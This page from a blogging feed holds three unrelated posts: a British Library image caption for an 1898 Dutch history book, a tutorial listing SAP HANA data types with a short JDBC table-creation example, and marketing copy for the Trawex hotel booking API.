British Library digitised image from page 473 of "Eene halve Eeuw, 1848-1898. Nederland onder de regeering van Koning Willem den Derde en het Regentschap van Koningin Emma door Nederlanders beschreven onder redactie van Dr P. H. Ritter. 3e ... uitgave, et by British Library Via Flickr: Image taken from: Title: "Eene halve Eeuw, 1848-1898. Nederland onder de regeering van Koning Willem den Derde en het Regentschap van Koningin Emma door Nederlanders beschreven onder redactie van Dr P. H. Ritter. 3e ... uitgave, etc" Author(s): Ritter, Pierre Henri, the Elder [person] British Library shelfmark: "Digital Store 9406.i.5" Page: 473 (scanned page number - not necessarily the actual page number in the publication) Place of publication: Amsterdam Date of publication: 1898 Type of resource: Monograph Language(s): Dutch Physical description: 2 dl (8°) Explore this item in the British Library’s catalogue: 003111164 (physical copy) and 014919377 (digitised copy) (numbers are British Library identifiers) Other links related to this image: - View this image as a scanned publication on the British Library’s online viewer (you can download the image, selected pages or the whole book) - Order a higher quality scanned version of this image from the British Library Other links related to this publication: - View all the illustrations found in this publication - View all the illustrations in publications from the same year (1898) - Download the Optical Character Recognised (OCR) derived text for this publication as JavaScript Object Notation (JSON) - Explore and experiment with the British Library’s digital collections The British Library community is able to flourish online thanks to freely available resources such as this. You can help support our mission to continue making our collection accessible to everyone, for research, inspiration and enjoyment, by donating on the British Library supporter webpage here. Thank you for supporting the British Library.
0 notes
ashleshashekhawat21 · 9 months ago
Text
The Different Data Types Supported by SAP HANA
 SAP HANA supports a variety of data types to handle different kinds of data efficiently. These data types can be broadly categorized into several groups:
1. Numeric Data Types
TINYINT: 1-byte unsigned integer (0 to 255).
SMALLINT: 2-byte integer (-32,768 to 32,767).
INTEGER: 4-byte integer (-2,147,483,648 to 2,147,483,647).
BIGINT: 8-byte integer (-9,223,372,036,854,775,808 to 9,223,372,036,854,775,807).
DECIMAL(p,s): Fixed-point number with precision p and scale s.
REAL: Single-precision floating-point number.
DOUBLE: Double-precision floating-point number.
2. Character Data Types
CHAR(n): Fixed-length character string with length n.
VARCHAR(n): Variable-length character string with a maximum length n.
CLOB: Character Large Object for large text data.
3. Binary Data Types
BINARY(n): Fixed-length binary data with length n.
VARBINARY(n): Variable-length binary data with a maximum length n.
BLOB: Binary Large Object for large binary data.
4. Date and Time Data Types
DATE: Stores year, month, and day values.
TIME: Stores hour, minute, and second values.
SECONDDATE: Stores year, month, day, hour, minute, second values.
TIMESTAMP: Stores year, month, day, hour, minute, second, and fractional seconds.
LONGDATE: Stores a timestamp with a larger range.
SECONDTIME: Stores a time with a larger range.
5. Boolean Data Type
BOOLEAN: Stores TRUE or FALSE.
6. Spatial Data Types
ST_POINT: Stores geometric points.
ST_GEOMETRY: Stores geometric shapes.
7. Text Data Types
TEXT: Stores large amounts of text data.
SHORTTEXT: Optimized for shorter text data.
8. JSON Data Type
JSON: Stores JSON formatted data.
9. Special Data Types
ARRAY: Stores an array of elements.
VARCHAR (ARRAY): Stores an array of variable-length strings.
NCLOB: National Character Large Object for large text data using UTF-8 encoding.
ALPHANUM(n): Variable-length alphanumeric string with a maximum length n.
SMALLDECIMAL: Decimal number with a small range and precision.
These data types allow SAP HANA to manage and process a wide variety of data efficiently, supporting the needs of different applications and use cases.
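To make this concrete, here is a minimal JDBC sketch that creates and fills a column table mixing several of these types. It assumes the SAP HANA JDBC driver (ngdbc) is on the classpath, and the host, port, credentials, and table name below are placeholders for your own system:
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.Statement;
public class HanaTypesDemo {
    public static void main(String[] args) throws Exception {
        // Placeholder connection details; replace them with your own HANA instance.
        String url = "jdbc:sap://hana-host:30015/";
        try (Connection conn = DriverManager.getConnection(url, "MY_USER", "MY_PASSWORD")) {
            try (Statement stmt = conn.createStatement()) {
                // Column table mixing numeric, character, date/time, and boolean types.
                stmt.execute("CREATE COLUMN TABLE ORDERS ("
                        + "ID BIGINT PRIMARY KEY, "
                        + "CUSTOMER NVARCHAR(100), "
                        + "AMOUNT DECIMAL(15,2), "
                        + "CREATED_AT TIMESTAMP, "
                        + "SHIPPED BOOLEAN)");
            }
            try (PreparedStatement ps = conn.prepareStatement(
                    "INSERT INTO ORDERS VALUES (?, ?, ?, CURRENT_TIMESTAMP, ?)")) {
                ps.setLong(1, 1001L);
                ps.setString(2, "Acme GmbH");
                ps.setBigDecimal(3, new java.math.BigDecimal("249.90"));
                ps.setBoolean(4, false);
                ps.executeUpdate();
            }
        }
    }
}
With a JDBC 4 driver such as ngdbc, DriverManager locates the driver automatically once the jar is on the classpath, so no explicit Class.forName call is needed.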
Anubhav Trainings is an SAP training provider that offers various SAP courses, including SAP UI5 training. Their SAP UI5 training program covers various topics, including warehouse structure and organization, goods receipt and issue, internal warehouse movements, inventory management, physical inventory, and much more.
Call us on +91-84484 54549
Mail us on [email protected]
Website: Anubhav Online Trainings | UI5, Fiori, S/4HANA Trainings
0 notes
trawexonline · 9 months ago
Text
Hotel API
Hotel API
There has never been a better way for you to develop your hotel booking platform using content from multiple supplier sources that can meet the exact requirements of your customers. Trawex offers a variety of connections and APIs to suit your business model, providing access to extensive global hotel content and the best negotiated deals, all through a single API integration.
Universal API - Great advantages for your business! A world of travel content for
Online Travel Agencies
Tour Operators
Corporates
Travel Management Companies
Hotel API Advantages
Choose the modules that are right for you.
Access to excellent negotiated rates.
Wider choice of hotels.
Real-time availability and confirmation.
Booking is simple.
Mapping and De-duplication
Clean & accurate data
Easy to Integrate
Integration Support
Personalised service
Cost savings
Search, Book, Confirm – Through a Single API Integration
Hotel API Features
Flexible, scalable and easy to integrate and implement
Build and update customised travel booking applications
Built on scalable Open System architecture
Decreased development costs and time to market
Custom-designed solutions which maximise efficiency
Completely scalable and Web 2.0 compliant
Reliable and robust
Independent of language and application framework
Real-time streaming of prices for your users
Continually optimised product solutions
RESTful API format, with JSON or XML responses available
Browse and Live price feeds
Why Trawex Universal Hotel API
Extend the Functionality of Your Website with Hotel Booking Engine API
With a wide range of accommodation choices in every location, each with its own pricing and availability, navigating multiple suppliers can be made simple with our Hotel API. By integrating our Hotel API with your travel portal, you as an Online Travel Agency can offer hard-to-beat hotel deals to your potential clients. With the Hotel API, you can browse a large number of hotel offers, book rooms, cancel rooms, generate reports for bookings and cancellations, and more, very easily. A good API is a valuable resource for a company. We realize this, and so through our Hotel API, everything can be customized according to the customer's needs. Trawex API aggregates hotel content into a single system from leading hotel suppliers, consolidators, hotel chains and online travel agencies (OTAs). We offer unrivalled hotel search and booking technology designed to meet all of your requirements.
Our Partner-Focused Approach Is Long-Term, Supporting You Through Integration, Optimization and Business Growth.
Trawex Hotel API offers rich hotel content that is generally not available from other travel aggregators. Our online booking system allows our clients to access our vast hotel inventory swiftly from anywhere in the world. Our hotel booking engine specializes in reserving hotels online with the very best hotels available. By integrating this travel and tourism API with your own software solution, you as a travel service supplier can provide hard-to-beat travel solutions to your potential clients, helping travel and tourism businesses complete hotel reservations easily. Trawex Hotel API provides comprehensive descriptions, including room types, images, and facilities, of over 500,000 properties worldwide. As one of the trusted API providers globally, we specialize in Hotel API integration. All our services are integrated, tested and maintained by an experienced team of professionals.
Hotel APIs are web services that allow travel companies to collect and aggregate information such as descriptions, galleries, availability and pricing from multiple hotel providers into a single-engine. It allows end-users to search and book hotels around the world using only one Hotel Booking System.
Trawex has experience with qualified professionals who are API integration specialists. Our API solutions make your portal not only user-friendly, but also adaptive. Our API portfolio includes broad inventories and a variety of APIs offered by global aggregators in the hotel domain.
Our Hotel API makes it possible for travelers to book rooms online, and this plays a vital role in the development of different properties nowadays. In today's world, it's time to move hotel room bookings from offline to online.
Integrate Your Website with API for Seamless Business Operation
Travel portals and applications built with our API are also adaptable to different devices and sizes, using the latest responsive technologies to automatically change the display layout to match the screen of the device used.
The portal gets real-time search data with the advantage of this software solution and learns the traveler's requirements for hotel booking. These can include room number, room type, destination, and the traveler's budget.
Hotel API is one of those search solutions that lets hotels provide travelers with the latest and most suitable search results, so they can seal the deal and reserve their itinerary through the portal. Our Hotel API will help your business increase revenues while automating processes and reducing the time and effort required to complete a room booking.
Travel agencies can automate their services such as hotel booking, reservation, payments and much more through hotel API integration. In addition, travelers nowadays love smart work, so when you have a fully automated website, travelers can rely on you and book their stay, making you the medium.
Why choose Trawex for Hotel API Integration?
What you need to do is integrate the hotel API into your website or management system, and yes! You have access to thousands of hotels and resorts all over the world. Our Hotel API provides comprehensive descriptions of more than 500,000 properties worldwide, including room types, pictures and services. As one of the trusted API providers, we are widely specialized in the integration of hotel APIs.
Hotel XML API:
Hotel XML API is a web service providing online functionality for searching and booking hotels. It gives you the opportunity to provide your clients with more and better options to select their ideal place to stay in a particular city, growing your business beyond its current limits. The complete transaction happens on your own website under your own brand. You can also collect payment from your customers by integrating a payment gateway.
Hotel reservation system:
A Hotel Reservation System is a necessity for today’s accommodation providers, both large and small. An increasing number of travelers are relying solely on online reservations in order to book their accommodations, and without this capability, you will lose a significant amount of business.
It gives you an advantage over your competitors.
It improves your efficiency as a business
Features:
Real-time integrations
Quick Booking Confirmations
Fast, Robust and scalable
Fully Flexible
Customizable response
Automatic end to end invoicing
Easy to use solutions for booking via call centre
Why Trawex Universal Hotel API?
Our Hotel API offers you the following benefits:
Easy hotel reservation facilities are available for the entire world.
Our service covers nearly all major hotel suppliers.
We provide powerful backend support through our reliable services.
No huge investment is needed to start offering hotel reservations.
The boom in the hotel industry favors promising results.
A Hotel Reservation API provides great value addition to an existing website or business.
Working capital depends on your daily transactions.
No minimum deposits or balance maintenance required.
For more details, please visit our website:
0 notes